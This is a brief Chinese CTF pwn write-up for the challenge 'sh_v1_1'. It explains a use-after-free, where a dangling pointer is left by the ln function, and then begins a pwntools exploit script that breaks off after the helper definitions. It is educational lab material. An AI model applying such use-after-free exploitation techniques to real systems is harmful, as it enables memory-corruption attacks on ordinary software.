【PWN专场】公开赛wp｜sh_v1_1

1.题⽬名称题目名称：sh_v1_12.题⽬考点本题考查对程序指令逆向对花指令等干扰指令排除UAF3.题⽬详细解题⽅法首先，程序中的花指令如下是可以排除干扰的程序主要实现了ls,rm,touch,cat,gedit等功能漏洞点主要在ln函数，ln函数链接时，将指针保存，但是在对原始指针删除时，未删除ln链接的指针，造成指针悬挂。exp:#coding=utf-8from pwn import *context.log_level = "debug"# context.arch = "i386"context.arch = "amd64"menu=""sh = 0lib = 0elf =ELF('sh_v1_1')libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")""" """l64 = lambda :u64(sh.recvuntil("\x7f")[-6:].ljust(8,"\x00"))l32 = lambda :u32(sh.recvuntil("\xf7")[-4:].ljust(4,"\x00"))leak = lambda name,data : sh.success(name + ": 0x%x" % data)s = lambda payload: sh.send(payload)sa = lambda a,b :sh.sendafter(str(a),str(b))sl = lambda payload: sh.sendline(payload)sla = lambda a,b :sh.sendlineafter(str(a),str(b))ru = lambda a :sh.recvuntil(s ………………………………